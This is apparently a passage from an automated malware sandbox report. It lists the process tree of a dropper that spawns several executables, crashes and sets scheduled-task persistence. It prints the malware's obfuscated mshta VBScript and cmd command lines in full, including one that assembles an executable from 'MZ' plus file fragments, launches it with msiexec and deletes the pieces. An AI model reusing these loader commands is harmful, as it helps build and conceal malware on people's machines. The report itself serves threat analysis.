C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09c42cad92c20f79.exeWed09c42cad92c20f79.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 14085⤵
- Program crash
PID:2592
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe3⤵
- Loads dropped DLL
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09977fdc12334.exeWed09977fdc12334.exe4⤵
- Executes dropped EXE
PID:2044 -
C:\Users\Admin\Pictures\Adobe Films\QNAWwcTtjYAlXHUSLsw6WwS_.exe"C:\Users\Admin\Pictures\Adobe Films\QNAWwcTtjYAlXHUSLsw6WwS_.exe"5⤵PID:1056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 8525⤵
- Program crash
PID:2712
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed094c47c32b.exe3⤵
- Loads dropped DLL
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed094c47c32b.exeWed094c47c32b.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1928 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))5⤵PID:2152
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"6⤵PID:2160
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1980 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))8⤵PID:2772
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"9⤵PID:2436
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1104 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t9⤵PID:2144
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"10⤵PID:2604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "10⤵PID:1480
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU10⤵PID:2796
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"7⤵
- Kills process with taskkill
PID:1076
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe3⤵
- Loads dropped DLL
PID:1348 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09d27135e5a8b3b.exeWed09d27135e5a8b3b.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:816 -
C:\Users\Admin\AppData\Local\Temp\is-NCUAI.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-NCUAI.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$1015E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09d27135e5a8b3b.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09d27135e5a8b3b.exe"C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09d27135e5a8b3b.exe" /SILENT6⤵PID:1696
-
C:\Users\Admin\AppData\Local\Temp\is-6V3N5.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-6V3N5.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$20170,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09d27135e5a8b3b.exe" /SILENT7⤵
- Executes dropped EXE
PID:2096 -
C:\Users\Admin\AppData\Local\Temp\is-6AHV8.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-6AHV8.tmp\postback.exe" ss18⤵PID:2696
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe3⤵
- Loads dropped DLL
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09b2a8bc4f16cb.exeWed09b2a8bc4f16cb.exe4⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe3⤵PID:668
-
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09abf83d9c2.exeWed09abf83d9c2.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09abf83d9c2.exe"C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09abf83d9c2.exe" -u5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1420
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9D5A79F8-FB3A-4C9C-91E7-28DF0A556910} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3504
-
C:\Users\Admin\AppData\Roaming\ceduaajC:\Users\Admin\AppData\Roaming\ceduaaj2⤵PID:2856
-
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:1568
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {418F00B4-97A4-47FC-8E90-1D49D23F73D8} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2800
-
C:\Windows\system32\taskeng.exetaskeng.exe {BE1061B5-38E6-4CC2-BB38-BD6B01279D14} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2072
-
C:\Windows\system32\taskeng.exetaskeng.exe {BA24FC82-F45D-48D8-885A-981C576C4F4E} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3164
-
C:\Users\Admin\AppData\Roaming\ceduaajC:\Users\Admin\AppData\Roaming\ceduaaj2⤵PID:972
-